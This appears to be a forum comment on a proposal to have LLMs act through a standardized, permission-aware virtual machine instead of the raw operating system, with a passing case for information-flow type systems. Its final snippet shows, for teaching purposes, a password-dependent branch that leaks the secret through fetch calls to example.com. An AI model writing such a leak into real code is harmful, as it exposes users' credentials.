An operating system (or sandbox, or whatever) is a very large virtual machine, where the "instructions" are the normal CPU instructions plus the set of syscalls. Unfortunately, operating systems today are complicated, hard to understand, and (relatively) hard to modify. For example, there are many different ways to sandbox file system access (chmod, containers, chroot, sandbox-exec on macOS etc.) and they each have bugs that have turned into "features" or subtle semantics. Plus, they are not available on all operating systems or even on all distributions of the same operating system. And then -- how do filesystem permissions and network permissions interact? Even of both of their semantics are "safe," is the composition of the two safe?
The assumption is: because operating systems are so complex, large, and underspecified, it probably is dangerous for LLMs to interact directly with the underlying operating system. We have observed this empirically: through CVEs in C and C++ code, we know that subtle errors or small differences in semantics can cascade into huge security vulnerabilities.
To address this, the authors propose that LLMs instead interact with a virtual machine where, for example, the semantics of permissions and/or capabilities is well-defined and standardized across different implementations or operating systems. (This is why they mention Java as an analogy -- the JVM gave developers the ability to write code for a vast array of architectures and operating systems without having to think about the underlying implementations.) This standardization makes it easier to understand how exactly an LLM would be allowed to interact with the outside world.
Besides semantic understanding and clarity, there are more benefits to designing a new virtual machine.
- Standardization across multiple model providers (mentioned).
- Better RLHF / constrained generation opportunity than general Bash output.
- Can incorporate advances in programming language theory and design.
For an example of the last point, in recent years, there has been a ton of research on information flow for security and privacy (mentioned in the article). In a programming language that is aware of information flow, I can mark my bank account password as "secret" and the input to all HTTP calls as "public." The type system or some other static analysis can verify that my password cannot possibly affect the input to any HTTP call. This is harder than you think because it depends on control flow! For example, the following program indirectly exfiltrates information about my password:
if (password.startsWith("hackernews")) {
fetch("https://example.com/a");
} else {
fetch("https://example.com/b");
}
Obviously, nobody would write that code, but people do write similar code with bugs in e.g. timing attacks.